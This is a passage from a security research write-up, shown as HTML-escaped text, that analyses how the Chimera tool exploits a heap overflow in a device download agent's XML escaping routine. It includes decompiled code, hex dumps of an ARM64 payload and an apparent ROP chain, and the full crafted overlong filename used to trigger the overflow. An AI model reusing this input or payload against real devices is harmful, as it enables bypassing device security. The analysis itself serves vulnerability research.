    &amp;lt;command&amp;gt;CMD:SET-RUNTIME-PARAMETER&amp;lt;/command&amp;gt;
    &amp;lt;arg&amp;gt;
        &amp;lt;checksum_level&amp;gt;NONE&amp;lt;/checksum_level&amp;gt;
        &amp;lt;da_log_level&amp;gt;ERROR&amp;lt;/da_log_level&amp;gt;
        &amp;lt;log_channel&amp;gt;UART&amp;lt;/log_channel&amp;gt;
        &amp;lt;battery_exist&amp;gt;AUTO-DETECT&amp;lt;/battery_exist&amp;gt;
        &amp;lt;system_os&amp;gt;LINUX&amp;lt;/system_os&amp;gt;
    &amp;lt;/arg&amp;gt;
    &amp;lt;adv&amp;gt;
        &amp;lt;initialize_dram&amp;gt;YES&amp;lt;/initialize_dram&amp;gt;
    &amp;lt;/adv&amp;gt;
&amp;lt;/da&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This basically tells both the DA1 and DA2 not to spit logs to UART unless they&apos;re errors, so instead of useful debug traces, we got mostly silence:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;***dagent_command_loop:***

@Protocol: Tx START-CMD(&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&amp;gt;&amp;lt;host&amp;gt;&amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;&amp;lt;command&amp;gt;CMD:START&amp;lt;/command&amp;gt;&amp;lt;/host&amp;gt;)

@Protocol: Rx Host CMD(&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;&amp;lt;da&amp;gt;&amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;&amp;lt;command&amp;gt;CMD:SET-RUNTIME-PARAMETER&amp;lt;/command&amp;gt;&amp;lt;arg&amp;gt;&amp;lt;checksum_level&amp;gt;NONE&amp;lt;/checksum_level&amp;gt;&amp;lt;da_log_level&amp;gt;ERROR&amp;lt;/da_log_level&amp;gt;&amp;lt;log_channel&amp;gt;UART&amp;lt;/log_channel&amp;gt;&amp;lt;battery_exist&amp;gt;AUTO-DETECT&amp;lt;/battery_exist&amp;gt;&amp;lt;system_os&amp;gt;LINUX&amp;lt;/system_os&amp;gt;&amp;lt;/arg&amp;gt;&amp;lt;adv&amp;gt;&amp;lt;initialize_dram&amp;gt;YES&amp;lt;/initialize_dram&amp;gt;&amp;lt;/adv&amp;gt;&amp;lt;/da&amp;gt;)

@Protocol: Execute CMD(CMD:SET-RUNTIME-PARAMETER)
[SPMI] spmi_init_1 done
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
Not BOOT_TRAP_EMMC_UFS
Host notice error or user canceled.
Unsupported command.m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Going back to the USB capture, the interesting stuff only started happening once DA2 was fully loaded.&lt;/p&gt;
&lt;p&gt;At first glance, we noticed that the very first thing Chimera did was issue two &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; commands, but one of them looked slightly off.&lt;/p&gt;
&lt;p&gt;A quick look at the capture revealed the following sequence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Send &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; with a normal filename&lt;/li&gt;
&lt;li&gt;Send the AIO file data (which looks like ARM64 code, not a real signature)&lt;/li&gt;
&lt;li&gt;Send another &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; with an absurdly long filename full of special characters&lt;/li&gt;
&lt;li&gt;Send a second AIO file&lt;/li&gt;
&lt;li&gt;Intentionally trigger an error by not sending the expected ACK&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This was clearly deliberate. But why send two AIO commands? And what&apos;s with the weird filename?&lt;/p&gt;
&lt;h2&gt;The AIO command&lt;/h2&gt;
&lt;p&gt;To understand what&apos;s going on, we analyzed what &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; is supposed to do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int cmd_security_set_all_in_one_signature(com_channel_struct *channel,char *xml)
{
  int status;
  mxml_node_t *tree;
  char *file_name;
  uint32_t all_in_one_sig_sz;
  uint8_t *all_in_one_sig;
  
  tree = mxmlLoadString((mxml_node_t *)0x0,xml,MXML_OPAQUE_CALLBACK);
  if (tree == (mxml_node_t *)0x0) {
    status = -0x3ffeffff;
    set_error_msg(&quot;Required XML node path not found. Check command string.&quot;);
  }
  else {
    file_name = mxmlGetNodeText(tree,&quot;da/arg/source_file&quot;);
    if (file_name == (char *)0x0) {
      status = -0x3ffeffff;
      set_error_msg(&quot;Required XML node path not found. Check command string.&quot;);
    }
    else {
      all_in_one_sig = (uint8_t *)0x0;
      all_in_one_sig_sz = 0;
      status = fp_read_host_file(channel,file_name,&amp;amp;all_in_one_sig,&amp;amp;all_in_one_sig_sz, &quot;Signature&quot;);
      if (status &amp;lt; 0) {
        free(all_in_one_sig);
      }
      else {
        set_all_in_one_signature_buffer(all_in_one_sig,all_in_one_sig_sz);
      }
    }
    mxmlDelete(tree);
  }
  return status;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The command first parses the XML using &lt;code&gt;mxmlLoadString&lt;/code&gt; (which allocates memory for the parsed tree), then extracts the &lt;code&gt;source_file&lt;/code&gt; argument and calls &lt;code&gt;fp_read_host_file&lt;/code&gt; to download that file from the host.&lt;/p&gt;
&lt;p&gt;Looking at &lt;code&gt;fp_read_host_file&lt;/code&gt;, we can see it allocates a buffer for the incoming data if the passed pointer is null:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int fp_read_host_file(com_channel_struct *channel, char *file_name, char **ppdata,
                      uint32_t *pdata_len, char *info)
{
  // ... escape filename and send download request to host ...
  
  // read total length from host
  bytes_read = (*channel-&amp;gt;read)(buf_total_length, &amp;amp;length);
  if (bytes_read == 0) {
    // ... parse response ...
    total_length = atoll(vec[1]);
    total_len = (uint)total_length;
    
    if ((*ppdata == (char *)0x0) || (*pdata_len == 0)) {
      // allocate buffer for file data
      *pdata_len = total_len;
      error_msg = (char *)malloc(total_length + 4 &amp;amp; 0xffffffff);
      *ppdata = error_msg;
      if (error_msg != (char *)0x0) goto consume_data;
      // ...
    }
    
consume_data:
    (*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);
    // ... read file data into buffer ...
  }
  // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Back in &lt;code&gt;cmd_security_set_all_in_one_signature&lt;/code&gt;, if &lt;code&gt;fp_read_host_file&lt;/code&gt; returns an error, the allocated buffer gets freed.&lt;/p&gt;
&lt;p&gt;Otherwise, &lt;code&gt;set_all_in_one_signature_buffer&lt;/code&gt; stores it in a global variable. Either way, &lt;code&gt;mxmlDelete(tree)&lt;/code&gt; cleans up the XML tree at the end.&lt;/p&gt;
&lt;p&gt;In normal usage, this command provides the DA with an &quot;all-in-one&quot; signature file containing cryptographic signatures for every partition on the device, allowing the DA to verify images during flashing without needing separate signature files for each partition.&lt;/p&gt;
&lt;p&gt;The first &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; Chimera sends looks perfectly normal, except the file content doesn&apos;t look like a valid AIO signature at all:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00000000  fd 7b be a9 f3 0b 00 f9  fd 03 00 91 b3 02 00 f0  |.{..............|
00000010  73 02 1b 91 e0 03 13 aa  f5 35 00 94 e0 03 13 aa  |s........5......|
00000020  f3 0b 40 f9 fd 7b c2 a8  c0 03 5f d6 e0 03 13 aa  |..@..{...._.....|
00000030  e8 03 00 aa e8 03 00 f0  08 e9 43 b9 08 41 00 51  |..........C..A.Q|
... more lines omitted for brevity ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The astute reader will notice this looks suspiciously like ARM64 instructions. The first four bytes &lt;code&gt;fd 7b be a9&lt;/code&gt; correspond to the typical function prologue &lt;code&gt;stp x29, x30, [sp, #-0x20]!&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The second AIO file was equally strange: a bunch of what looked like pointers, possibly a ROP chain?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00000000  cc 24 06 40 00 00 00 00  cc 24 06 40 00 00 00 00  |.$.@.....$.@....|
00000010  34 ec 03 40 00 00 00 00  f4 f7 02 40 00 00 00 00  |4..@.......@....|
00000020  00 ac 05 40 00 00 00 00  9c a7 00 40 00 00 00 00  |...@.......@....|
00000030  f0 f1 01 40 00 00 00 00  3c e8 02 40 00 00 00 00  |...@....&amp;lt;..@....|
... more lines omitted for brevity ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Little did we know, most of both files were just padding or junk data that Chimera added to confuse analysis. More on that later.&lt;/p&gt;
&lt;p&gt;At this point, we weren&apos;t sure what any of this meant. But the weird filename in the second command was the more obvious lead.&lt;/p&gt;
&lt;p&gt;For the second command, Chimera sent an absurdly long filename full of special characters:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;&amp;lt;da&amp;gt;&amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;&amp;lt;command&amp;gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&amp;lt;/command&amp;gt;&amp;lt;arg&amp;gt;&amp;lt;source_file&amp;gt;
;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;&amp;amp;gt;;;;;;;;&amp;amp;amp;;;;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;gt;&amp;amp;lt;;&amp;amp;quot;;&amp;amp;amp;;;;;;;&amp;amp;gt;;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;&amp;amp;lt;;;;;;&amp;amp;amp;&amp;amp;lt;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;&amp;amp;quot;;;;;;;;;;;&amp;amp;amp;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;&amp;amp;quot;;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;&amp;amp;gt;&amp;amp;gt;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;gt;;;;;;;;;;&amp;amp;quot;;&amp;amp;gt;;;;;;&amp;amp;quot;;&amp;amp;gt;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;&amp;amp;quot;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;gt;;;;;;;;;;;&amp;amp;amp;&amp;amp;gt;&amp;amp;quot;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;lt;;;;;;;;&amp;amp;amp;&amp;amp;gt;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;amp;;;;&amp;amp;lt;;;;&amp;amp;lt;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;quot;&amp;amp;gt;;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;&amp;amp;quot;;;;;&amp;amp;lt;;&amp;amp;lt;;;;;;;&amp;amp;amp;&amp;amp;gt;;&amp;amp;lt;&amp;amp;quot;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;&amp;amp;quot;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;&amp;amp;amp;;;&amp;amp;lt;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;&amp;amp;lt;&amp;amp;amp;;;;;;&amp;amp;lt;&amp;amp;amp;;&amp;amp;amp;;;;;;;&amp;amp;lt;;;&amp;amp;quot;;;;;&amp;amp;gt;;;;&amp;amp;quot;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;&amp;amp;amp;&amp;amp;gt;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;;;;&amp;amp;lt;;;&amp;amp;amp;;;;;;;;;;;;&amp;amp;lt;;;&amp;amp;lt;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;amp;;;;&amp;amp;amp;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;lt;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;lt;&amp;amp;quot;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;&amp;amp;gt;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;lt;;;;;;&amp;amp;quot;;;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;quot;;;;;;&amp;amp;amp;;;;;&amp;amp;amp;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;&amp;amp;gt;;;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;&amp;amp;gt;;;&amp;amp;lt;;;&amp;amp;gt;;;;;&amp;amp;amp;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;gt;;;;;;;;&amp;amp;amp;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;&amp;amp;gt;;;&amp;amp;gt;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;&amp;amp;amp;;;&amp;amp;quot;;;;;&amp;amp;gt;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;quot;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;lt;;;;&amp;amp;lt;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;quot;;&amp;amp;lt;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;quot;;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;lt;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;gt;;&amp;amp;amp;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;lt;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;quot;;;&amp;amp;lt;;;;;;;;;;;;;;;;&amp;amp;quot;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;&amp;amp;lt;;;;;;;;;;;;;&amp;amp;gt;;;;&amp;amp;quot;;;&amp;amp;gt;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;amp;;;;;&amp;amp;quot;;;;;;;&amp;amp;amp;&amp;amp;quot;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;&amp;amp;lt;;&amp;amp;lt;;&amp;amp;gt;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;amp;;;&amp;amp;lt;&amp;amp;lt;&amp;amp;gt;&amp;amp;amp;;&amp;amp;gt;;;&amp;amp;lt;;;;;;;;;;;&amp;amp;quot;;&amp;amp;lt;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;quot;;;;&amp;amp;amp;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;lt;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;gt;;;&amp;amp;quot;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;lt;;&amp;amp;gt;&amp;amp;quot;;;;;&amp;amp;amp;&amp;amp;amp;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;amp;;;&amp;amp;lt;;;&amp;amp;quot;;;;;&amp;amp;gt;;;&amp;amp;quot;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;gt;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;gt;&amp;amp;quot;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;quot;;&amp;amp;gt;;&amp;amp;amp;;;;&amp;amp;quot;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;&amp;amp;quot;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;&amp;amp;quot;&amp;amp;quot;&amp;amp;lt;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;&amp;amp;lt;;&amp;amp;quot;;;&amp;amp;gt;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;quot;;&amp;amp;lt;;;;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;lt;;;;;;&amp;amp;amp;;;;;;&amp;amp;gt;;;;;&amp;amp;amp;;;;;;&amp;amp;amp;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;&amp;amp;gt;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;lt;&amp;amp;amp;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;gt;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;gt;&amp;amp;quot;;;;;&amp;amp;amp;;;;;&amp;amp;amp;&amp;amp;quot;&amp;amp;quot;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;&amp;amp;amp;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;quot;&amp;amp;gt;;;;;;;;;;;&amp;amp;lt;&amp;amp;quot;;;;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;quot;&amp;amp;amp;;;&amp;amp;quot;&amp;amp;lt;;&amp;amp;quot;;&amp;amp;quot;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;quot;;;;&amp;amp;amp;;;;&amp;amp;lt;;&amp;amp;quot;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;quot;;;;;;;;;;;;;;;&amp;amp;lt;&amp;amp;lt;&amp;amp;lt;;;;;;;&amp;amp;lt;;&amp;amp;quot;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;&amp;amp;amp;;;&amp;amp;amp;;;;;;;&amp;amp;amp;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;&amp;amp;quot;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;quot;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;quot;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;amp;&amp;amp;quot;&amp;amp;amp;;&amp;amp;amp;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;&amp;amp;gt;;&amp;amp;gt;;;;;&amp;amp;amp;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;&amp;amp;quot;&amp;amp;quot;;;;;;;;;&amp;amp;gt;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;gt;&amp;amp;amp;;&amp;amp;lt;;;;;;&amp;amp;lt;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;&amp;amp;gt;;;&amp;amp;lt;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;amp;&amp;amp;amp;;&amp;amp;amp;;;;;;;&amp;amp;amp;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;amp;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;gt;;;&amp;amp;lt;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;&amp;amp;amp;;;;;;;;;;;&amp;amp;quot;;;;;;&amp;amp;quot;;;;;;&amp;amp;gt;;;;;&amp;amp;amp;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;amp;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;quot;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;lt;;;&amp;amp;amp;&amp;amp;amp;&amp;amp;gt;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;;;;;;;;;&amp;amp;gt;;;;;;;;;&amp;amp;quot;;&amp;amp;lt;;&amp;amp;amp;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;&amp;amp;quot;;;;;;;&amp;amp;gt;;&amp;amp;amp;;;;;&amp;amp;gt;&amp;amp;lt;;;;;&amp;amp;gt;;;;&amp;amp;amp;;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;gt;;;&amp;amp;amp;;&amp;amp;gt;;&amp;amp;gt;;;;&amp;amp;quot;;;;&amp;amp;amp;;;;;;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;amp;;;;;;&amp;amp;gt;&amp;amp;quot;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;quot;;;;;;;&amp;amp;gt;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;&amp;amp;gt;;;;&amp;amp;gt;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;lt;;;;&amp;amp;quot;;;;;;;&amp;amp;gt;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;quot;&amp;amp;quot;;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;gt;;&amp;amp;gt;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;&amp;amp;gt;;;&amp;amp;amp;&amp;amp;amp;;;&amp;amp;gt;&amp;amp;lt;;;;
&amp;lt;/source_file&amp;gt;&amp;lt;/arg&amp;gt;&amp;lt;/da&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This quickly caught our attention, so we decided to check what the DA was doing with the name.&lt;/p&gt;
&lt;h2&gt;XML Expansion&lt;/h2&gt;
&lt;p&gt;Like we mentioned before, the AIO command invokes &lt;code&gt;fp_read_host_file&lt;/code&gt; to download the specified file from the host. But before initiating the transfer, the function calls &lt;code&gt;mxml_escape&lt;/code&gt; on the filename to sanitize it for XML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filename_len = strnlen(file_name, 0x200);
escaped_xml = mxml_escape(file_name, (uint32_t)filename_len);
bytes_read = snprintf((char *)(result + 0x40), XML_CMD_BUFF_LEN,
    &quot;&amp;lt;?xml version=\&quot;1.0\&quot; encoding=\&quot;utf-8\&quot;?&amp;gt;&amp;lt;host&amp;gt;...&quot;
    &quot;&amp;lt;source_file&amp;gt;%s&amp;lt;/source_file&amp;gt;...&amp;lt;/host&amp;gt;&quot;,
    error_msg, buf, escaped_xml, (ulong)package_Len);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is in &lt;code&gt;mxml_escape&lt;/code&gt;. It allocates a fixed 512-byte buffer (&lt;code&gt;0x200&lt;/code&gt;) and expands special XML characters without any bounds checking:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *mxml_escape(char *src, uint32_t len)
{
  byte bVar1;
  char *pcVar2;
  byte *dest;
  byte *pbVar3;
  ulong uVar4;

  if ((_dest == (byte *)0x0) &amp;amp;&amp;amp;
      (_dest = (byte *)malloc(0x200), _dest == (byte *)0x0)) {
    return &quot;&quot;;
  }
  pcVar2 = (char *)_dest;
  memset(_dest, 0, 0x200);
  if (src == (char *)0x0) {
    pcVar2 = &quot;null&quot;;
  } else {
    pbVar3 = (byte *)pcVar2;
    if (len != 0) {
      uVar4 = (ulong)len;
      dest = (byte *)pcVar2;
      do {
        bVar1 = *src;
        if (bVar1 == 0x22) {
